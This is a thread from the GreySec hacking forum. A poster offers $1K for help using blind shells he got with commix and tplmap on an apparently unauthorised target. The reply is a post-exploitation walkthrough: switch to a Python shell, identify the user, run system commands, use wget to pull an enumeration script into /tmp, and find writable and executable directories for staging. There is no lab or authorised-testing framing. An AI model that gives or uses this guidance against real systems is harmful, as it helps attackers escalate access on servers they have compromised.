GreySec Forums

Full Version: Pseudo-terminal Shell....
I need to get answers quick, no bs. I will pay 1K to whoever guides me through these two.

I am on jabber at 
First one is a "pseudoterminal" I got from commix
with no output, only the letters A and B.
The second shell is from tplmap. It is a blind shell with the only outputs being true & false.
I'll provide copy and paste output etc...
I'd appreciate any help. I stand by my word, '1K',
for a full guide on my shellz.
If commix only gives you A and B as output, it is likely you have a false positive. Just to be sure, you can try the following. Given you're trying to inject commands into a *nix based OS, there is a good chance they might have the python interpreter installed. Try switching to a python shell instead; commix comes with this option. If I recall, a python shell is simply a python interpreter instance with the output relayed back to your box. Once you're switched to a python interpreter, run the following:

>>> import getpass
>>> print(getpass.getuser())

This will print the user within whose context you are working. Let's say you're working within the context of the user/process 'apache'. If it's reasonable to assume this process can make system calls, try the following:

>>> import os
>>> import sys
>>> os.system("uname -a")

To find out more about the box you're on. If this returns output, you can run bash commands between parentheses and quotation marks. A couple of handy bash commands to have here would include the following:

wget -O /tmp/  # Shellscript for linux enumeration, drop in /tmp/ if world writable.

tar -xvf file.tar    # unzip tar to current directory

tar -xvf archive.tar -C [destination]  # unzip tar to destination

unzip -d destination_folder

which [util name]     # i.e. 'which wget' to get path etc

find ~           # lists everything under your home directory

find /tmp/          # lists everything in tmp directory etc

find / -perm -o+x -type d 2>/dev/null                    # find world-executable folders

find / \( -perm -o+w -perm -o+x \) -type d 2>/dev/null   # world-writeable & executable folders

find / -writable -type d 2>/dev/null              # list folders writable by the current user